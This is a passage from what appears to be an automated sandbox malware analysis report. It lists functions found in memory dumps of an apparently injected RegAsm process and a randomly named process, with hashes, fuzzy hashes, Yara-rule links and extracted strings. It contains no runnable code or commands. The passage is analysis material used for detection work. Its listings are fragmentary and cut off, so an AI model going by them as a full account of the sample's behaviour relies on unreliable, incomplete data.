                                                                                          • Opcode ID: 27c67dcbcf6dc5ca0892fcb57b1b61141d18f3bf32c939f74dec1ce9b6e8e080
                                                                                          • Instruction ID: c8107d10e828b920039e28300cbc6c715b99dd03944c5e9af9e9340d4a485257
                                                                                          • Opcode Fuzzy Hash: 27c67dcbcf6dc5ca0892fcb57b1b61141d18f3bf32c939f74dec1ce9b6e8e080
                                                                                          • Instruction Fuzzy Hash: 2B90023122141802D104B5985408646000587E0301F55D011A6024555EC7A689D16231
                                                                                          Function 03232CF0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5670ce9f182fd4caffdd55386d0f3f8a6d19c10fdffb1d162b54424adefe7fd3
                                                                                          • Instruction ID: 4ec7c63a6a55b74daf2ef8f2d5cbde476b397a51d482e05b41698afc821c42ee
                                                                                          • Opcode Fuzzy Hash: 5670ce9f182fd4caffdd55386d0f3f8a6d19c10fdffb1d162b54424adefe7fd3
                                                                                          • Instruction Fuzzy Hash: 0F90023122141803D104B1585508707000587D0201F55D411A1424558DD79789916221
                                                                                          Function 03232CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9dd6f1a047a884db175262e1ca1b17cc82da4e1837debef10e874dfb4fe7758c
                                                                                          • Instruction ID: c8a08f4d72d3f2264d72cf7c261be57b222109433cea53f50d9bf6621aec1a9f
                                                                                          • Opcode Fuzzy Hash: 9dd6f1a047a884db175262e1ca1b17cc82da4e1837debef10e874dfb4fe7758c
                                                                                          • Instruction Fuzzy Hash: F790022162541802D144B1585418706001587D0201F55D011A1024554DC79A8B9567A1
                                                                                          Function 03232C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction ID: 04689a6dac0d42809de7975db5ef7dd672fec34273a0b0cd0efe7ad67e7cfe7c
                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Function 03232890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                          • API String ID: 48624451-2108815105
                                                                                          • Opcode ID: b481d1f0274cd8d0772c38e7c3abd24f7383409c501636071fa31edda7984513
                                                                                          • Instruction ID: cc3c66b0278c82745270b6743f44849f13e7c2e759b9a3351336a1909864204b
                                                                                          • Opcode Fuzzy Hash: b481d1f0274cd8d0772c38e7c3abd24f7383409c501636071fa31edda7984513
                                                                                          • Instruction Fuzzy Hash: C051B3F6A20256EFCB10DF98C89097EF7B8FF492017148669E465E7641D374DED08BA0
                                                                                          Function 03227630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03264787
                                                                                          • ExecuteOptions, xrefs: 032646A0
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03264655
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032646FC
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03264742
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03264725
                                                                                          • Execute=1, xrefs: 03264713
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: 9f1a4a47f0c6dddadb77e2fd342aef0a6bc24a75936ec2fa5397721c2bd9c95f
                                                                                          • Instruction ID: 5ab0b7cc5f87a8995b4be2adb53cbd2ec04183ab189f1684a9e9601cf1babe92
                                                                                          • Opcode Fuzzy Hash: 9f1a4a47f0c6dddadb77e2fd342aef0a6bc24a75936ec2fa5397721c2bd9c95f
                                                                                          • Instruction Fuzzy Hash: 42511A7562432A7BDF11EAA9DC89FBD7BACAF09300F0400E9D505AB192D7B19AC58F50
                                                                                          Function 0323B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-$0$0
                                                                                          • API String ID: 1302938615-699404926
                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                          • Instruction ID: bb42499810287444c69eb803f8e38f5f7ed613c03a93c66fd5c2aac8da816825
                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                          • Instruction Fuzzy Hash: 9C81DEF5E6524A9ADF24CE68C8917FEBBB6EF47310F1C425AD861A7391C77088C18B50
                                                                                          Function 0321F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032602BD
                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032602E7
                                                                                          • RTL: Re-Waiting, xrefs: 0326031E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                          • API String ID: 0-2474120054
                                                                                          • Opcode ID: 002a9a56c6f25eafbf06427055c3450e53dbfb0d4b89999b02d3387eee842db3
                                                                                          • Instruction ID: 9ebfd6f8477f74d13f3cbfdd19fe4bb1f5e878dd30516ef3e465042b2a2c329a
                                                                                          • Opcode Fuzzy Hash: 002a9a56c6f25eafbf06427055c3450e53dbfb0d4b89999b02d3387eee842db3
                                                                                          • Instruction Fuzzy Hash: 7DE1D071628742AFD724CF28CA84B2AB7E0BF84714F184A5DF4A58B2D0D7B4D8D5CB42
                                                                                          Function 0322BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03267B7F
                                                                                          • RTL: Resource at %p, xrefs: 03267B8E
                                                                                          • RTL: Re-Waiting, xrefs: 03267BAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          • API String ID: 0-871070163
                                                                                          • Opcode ID: 06f8220fe3f544db569c5b97189f2d739dd6be27ea36c0a3c52e44a5d6f17cf5
                                                                                          • Instruction ID: b7996f7f38ffacf86ffc6bb1b1133db059bd5fb5594367ce5dfc1e0487bb775a
                                                                                          • Opcode Fuzzy Hash: 06f8220fe3f544db569c5b97189f2d739dd6be27ea36c0a3c52e44a5d6f17cf5
                                                                                          • Instruction Fuzzy Hash: 0541F435324703AFC724DE29DC40B6ABBE5EF89710F140A1DF856DB280DB71E4858B91
                                                                                          Function 0322B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0326728C
                                                                                          Strings
                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03267294
                                                                                          • RTL: Resource at %p, xrefs: 032672A3
                                                                                          • RTL: Re-Waiting, xrefs: 032672C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          • API String ID: 885266447-605551621
                                                                                          • Opcode ID: 7950bb8d12f7e63ed47da65f57ded549ff4607dcfd148468b312ce44905d8ea5
                                                                                          • Instruction ID: c17fda157fb3ef596e87bafec57761d3b7ca309dfc37f5d815426f6e646931a0
                                                                                          • Opcode Fuzzy Hash: 7950bb8d12f7e63ed47da65f57ded549ff4607dcfd148468b312ce44905d8ea5
                                                                                          • Instruction Fuzzy Hash: DB41EF35620316AFD720DE29CC81B6AB7A5FF49714F140619FC56AB280DB71E8D2CBD1
                                                                                          Function 03237D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-
                                                                                          • API String ID: 1302938615-2137968064
                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                          • Instruction ID: e05112b622f7c261e4f731f032a763d7f6ff32a0fc3f5a254fdda8cbaf16c082
                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                          • Instruction Fuzzy Hash: 4E91A3F1E2021B9BDF24DE6DC8806BEB7A5FF46720F18455AE865EB2C0D77099C18B50
                                                                                          Function 031F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@
                                                                                          • API String ID: 0-1194432280
                                                                                          • Opcode ID: 8b333eb380190de38808d885bebd1d98aa240ba87c7ce61a9e328bb05e152f16
                                                                                          • Instruction ID: b5e916e15792b1708dcd93d6378c43cfd65931ae03cd48102df668bec6d5e612
                                                                                          • Opcode Fuzzy Hash: 8b333eb380190de38808d885bebd1d98aa240ba87c7ce61a9e328bb05e152f16
                                                                                          • Instruction Fuzzy Hash: 56812975D10269DBDB25DF54CC44BEAB7B8AB08710F0445EAAA19B7280D7709EC4CFA0

                                                                                          Executed Functions

                                                                                          Function 035680CB Relevance: 34.2, Strings: 27, Instructions: 460COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H$!$$$%$)G$*$,$-=$3M$;$>w$C$D$V$W$cm$c{$d$fh$g_$j$r3$r}$sE${2$}$*
                                                                                          • API String ID: 0-2708230074
                                                                                          • Opcode ID: 5a1fe4c92edec7d06655af5dcd6d202f110381186d517037edef62ddf4ed1552
                                                                                          • Instruction ID: 686642a51c62c6dc2d7e7026ac8ecd8352b320c2b68effa294749877cdc1e198
                                                                                          • Opcode Fuzzy Hash: 5a1fe4c92edec7d06655af5dcd6d202f110381186d517037edef62ddf4ed1552
                                                                                          • Instruction Fuzzy Hash: 5132BFB0D05269CBEB24CF44D8947DDBBB2BB84308F1489D9D10A7B2A0D7B95AC9CF45
                                                                                          Function 03575CCB Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$O$S$\$s
                                                                                          • API String ID: 0-3854637164
                                                                                          • Opcode ID: 030a012834c05ce8b5c1114f46b96f43857e9ea838d8be52fbc53e52d60f7add
                                                                                          • Instruction ID: 27fc0c7983eedaed7f8c39e41632866fa169c24f677f8e43f68f145ab570aeb4
                                                                                          • Opcode Fuzzy Hash: 030a012834c05ce8b5c1114f46b96f43857e9ea838d8be52fbc53e52d60f7add
                                                                                          • Instruction Fuzzy Hash: 7751AFB6D01218AFDB10EF94EC89AFEB378FB84311F148599ED09AB154F7705A448BA1
                                                                                          Function 0357ED3B Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ^gp
                                                                                          • API String ID: 0-3822737140
                                                                                          • Opcode ID: 2a3683e601496074fde01f88aadf793e6c6bbca9056012dafe12a172fdbfc57a
                                                                                          • Instruction ID: 4002be6e94ac12a88f6dd6e29207cc0bd3bea50c4bdd37b9772809f9e38efaef
                                                                                          • Opcode Fuzzy Hash: 2a3683e601496074fde01f88aadf793e6c6bbca9056012dafe12a172fdbfc57a
                                                                                          • Instruction Fuzzy Hash: 4451BE32609655ABD710DB78FCD2997B7ACFF95614B2806DDDC54CF266D212D802C3C2
                                                                                          Function 0358301B Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Vz
                                                                                          • API String ID: 0-501772303
                                                                                          • Opcode ID: ace5cb3ce2f092dd51584bd7829e108fcbf84d9d28b134405469509ed6d92b9c
                                                                                          • Instruction ID: c28e66206e2232e9d3fde6214cb05fa23e09e81725569642d024e60fcaa6ddf4
                                                                                          • Opcode Fuzzy Hash: ace5cb3ce2f092dd51584bd7829e108fcbf84d9d28b134405469509ed6d92b9c
                                                                                          • Instruction Fuzzy Hash: F721FEB6D01219AF8B00DFA9D8419EFB7F9FF88610F14456AE919E7200E7709A05CBA1
                                                                                          Function 0358350B Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: n
                                                                                          • API String ID: 0-2391717367
                                                                                          • Opcode ID: 27ee31f1c8fb12eac625364092d8c3555f0c1f3d3178458069d2713f932f5fc6
                                                                                          • Instruction ID: 301f41e22c40479dadece8395890c534d2d72ea3338cad79de04b206ff6c8f04
                                                                                          • Opcode Fuzzy Hash: 27ee31f1c8fb12eac625364092d8c3555f0c1f3d3178458069d2713f932f5fc6
                                                                                          • Instruction Fuzzy Hash: 7F2103B6D01219AFDB00DFA9D8419EFB7F9FF88610F14415EE919E7204E7709A05CBA0
                                                                                          Function 0358435B Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: }
                                                                                          • API String ID: 0-3424800134
                                                                                          • Opcode ID: 03a6c5f330a0e8191d0d1c7fd46260b194cad9fcaa7b1af01d859ec37526a0fa
                                                                                          • Instruction ID: d1ee1e9c7637f1a8555806c4722cac0e7ec53cc3e56971e7e669852d43a6b770
                                                                                          • Opcode Fuzzy Hash: 03a6c5f330a0e8191d0d1c7fd46260b194cad9fcaa7b1af01d859ec37526a0fa
                                                                                          • Instruction Fuzzy Hash: 1A111FB6D0121DAFCB00DFA9D8419EFB7F9FF88200F14416AE919E7200E7719A008BA1
                                                                                          Function 0356149B Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dde5c3c79bd46b9e406da6c5eeeccffbb64dd1faacea1958786ba73de257e966
                                                                                          • Instruction ID: 9ff2e4f79b6c0aaff2b0e106a8aaca266302258ee5233b11b884cd7337f2d0f9
                                                                                          • Opcode Fuzzy Hash: dde5c3c79bd46b9e406da6c5eeeccffbb64dd1faacea1958786ba73de257e966
                                                                                          • Instruction Fuzzy Hash: 1641FAB1D11219AFDB04DF99D881AEEBBBCFF49710F10455AFA18E7240E7B09641CBA4
                                                                                          Function 03586D5B Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6c836cafdaa130ad1c193768fb7e33066bda9ddcee0e4f9e8ffa24696b7230e7
                                                                                          • Instruction ID: 1b769402b59fe5ebf6a02f7dbbdf3576fe23f8b27020d1f0876d7f283863ef62
                                                                                          • Opcode Fuzzy Hash: 6c836cafdaa130ad1c193768fb7e33066bda9ddcee0e4f9e8ffa24696b7230e7
                                                                                          • Instruction Fuzzy Hash: 3A31AEB5A01608AFDB14DF98D881EEEB7F9FF8C300F108659F919A7340D730A9518BA4
                                                                                          Function 0358684B Relevance: .1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0ba67e25e7382c6959824169f2517bbeef0a9b849f27541f10cbfeab08c2f47
                                                                                          • Instruction ID: 83ac18c1e763e14b2b1b71a9aa48839df07a0557734d8487f0a2d4e3be7b724a
                                                                                          • Opcode Fuzzy Hash: d0ba67e25e7382c6959824169f2517bbeef0a9b849f27541f10cbfeab08c2f47
                                                                                          • Instruction Fuzzy Hash: 4A31D4B5A00609AFDB14DF98D881EDEB7B9FF8C310F108619FD19A7340D730A9018BA5
                                                                                          Function 03586ECB Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37450ed9320ed747583e76d7116aa8136903bf487740203701d810e32cbb4698
                                                                                          • Instruction ID: 29f7abf1e6633bc73707deb409648552e007e4c6dee4d159c799ccc1636a6a04
                                                                                          • Opcode Fuzzy Hash: 37450ed9320ed747583e76d7116aa8136903bf487740203701d810e32cbb4698
                                                                                          • Instruction Fuzzy Hash: B731C7B5A00609AFDB14DF98D881EEEB7B9FF8C310F108659FD19A7350D730A9118BA5
                                                                                          Function 0358676B Relevance: .1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 12df1f34ff6068796d62d5657343c1cf71f97c741f8d7bb9722ee6a4f890f02b
                                                                                          • Instruction ID: b37612e7c609df07794dfd745603d0d354d97ef82160d6237c23012b55a2e08c
                                                                                          • Opcode Fuzzy Hash: 12df1f34ff6068796d62d5657343c1cf71f97c741f8d7bb9722ee6a4f890f02b
                                                                                          • Instruction Fuzzy Hash: F031D875A00609ABDB14EF59DC81EDF77B9EF88300F108549F919A7250D730A9118BA5
                                                                                          Function 0358710B Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6026ceda241b38e3d4950ec4aeb836ab5f1684dc733889314fd511cf75e31ef6
                                                                                          • Instruction ID: 79026ae10a85f3b09d77e4a818aea54d13e4c962c5b3ccba530f0a3b803027a4
                                                                                          • Opcode Fuzzy Hash: 6026ceda241b38e3d4950ec4aeb836ab5f1684dc733889314fd511cf75e31ef6
                                                                                          • Instruction Fuzzy Hash: D02107B5A00609AFDB14EF98DC85EAF77B8FF88300F008549FD19A7240D770A9128BA5
                                                                                          Function 03575B0B Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f50ed88d6371a4a314fe082c5f71a0f6004bf9c2f709cd01a49007d96049a34
                                                                                          • Instruction ID: c41b365335bddbeae6883f3c75353389b4db2df44230c35320145fcf6d9b919b
                                                                                          • Opcode Fuzzy Hash: 2f50ed88d6371a4a314fe082c5f71a0f6004bf9c2f709cd01a49007d96049a34
                                                                                          • Instruction Fuzzy Hash: F71170B67807457AF720EE55AC82FAB776CABC5F10F244015FB08BE2C1D6A4B81146B8
                                                                                          Function 035863FB Relevance: .1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6e00ae32ac056cc0f8cb78f7ffa69379f4c48db53c9c90554240c11dcf1390c
                                                                                          • Instruction ID: aa635c1ea8b741d6c298b877c8c5fa8316e13eb7c1e4cb84e0d4db7f585228be
                                                                                          • Opcode Fuzzy Hash: f6e00ae32ac056cc0f8cb78f7ffa69379f4c48db53c9c90554240c11dcf1390c
                                                                                          • Instruction Fuzzy Hash: 2B114C75600705AFE714EB54DC85FAF77BCEFC5310F404549FA196B290E7706A128BA1
                                                                                          Function 0358657B Relevance: .1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8dcca712f7d34bb578128adfd0739e9008b4fd27078ab797ad81507f663a4dfe
                                                                                          • Instruction ID: a5b67e93686e29d107d90fef5dd1f8871f463009ddb659805295eb0dc58e31df
                                                                                          • Opcode Fuzzy Hash: 8dcca712f7d34bb578128adfd0739e9008b4fd27078ab797ad81507f663a4dfe
                                                                                          • Instruction Fuzzy Hash: CA115E75A00755ABE714EB58DC85FEF77BCEFC5310F004949FA196B280D7706A058BA1
                                                                                          Function 03583C6B Relevance: .1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
